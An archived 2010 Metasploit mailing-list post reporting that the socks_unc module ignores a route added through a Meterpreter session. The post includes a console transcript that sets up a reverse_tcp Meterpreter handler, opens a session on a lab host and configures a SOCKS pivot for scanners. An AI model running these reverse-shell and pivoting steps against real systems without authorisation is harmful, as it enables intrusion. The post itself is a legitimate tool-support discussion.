metasploit-framework March 2010 archive

[framework] Bug report or Feature request socks_unc/route

From: Mark Baggett <lo127001_at_nospam>
Date: Wed Mar 17 2010 - 01:55:31 GMT
To: framework@spool.metasploit.com

I don't know if this is a bug or a product enhancement, but here it
goes....

I want to use Proxychains to route nmap, nessus and other tcp/udp
tools through a meterpreter session. After I get Meterpreter on a
host as session 1 I want to add a route and use the SOCKS_UNC server
with proxychains. Similar to these vids but instead of an SSH server
use the SOCKS_UNC auxiliary module:

http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html
http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html

But the SOCKS_UNC server doesn't use the route that is added and
packets still route locally. Here is what I did:

root@bt:/pentest/exploits/framework3# ./msfconsole

                                   _ _
              _ | | (_)_
  ____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                            |_|

        =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 533 exploits - 254 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
        =[ svn r8826 updated today (2010.03.15)

msf > color false
msf > use multi/handler
msf exploit(handler) > set LHOST 172.16.186.132
LHOST => 172.16.186.132
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

    Name Current Setting Required Description
    ---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique: seh, thread, process
    LHOST     172.16.186.132   yes       The local address
    LPORT     80               yes       The local port

Exploit target:

    Id Name
    -- ----
    0 Wildcard Target

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.186.132:80
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (172.16.186.132:80 -> 172.16.186.128:3782)

meterpreter >
Background session 1? [y/N] y
[-] Unknown command: y.
msf exploit(handler) > route add 0.0.0.0 0.0.0.0 1
msf exploit(handler) > back
use server/socksmsf > use server/socks_unc
msf auxiliary(socks_unc) > set SRVPORT 9050
SRVPORT => 9050
msf auxiliary(socks_unc) > set SRVHOST 172.16.186.132
SRVHOST => 172.16.186.132
msf auxiliary(socks_unc) > show options

Module options:

    Name        Current Setting  Required  Description
    ----        ---------------  --------  -----------
    SRVHOST     172.16.186.132   yes       The local host to listen on.
    SRVPORT     9050             yes       The local port to listen on.
    SSL         false            no        Negotiate SSL for incoming connections
    SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
    UNCHOST                      no        The address of the UNC host.

Thanks,
Mark Baggett
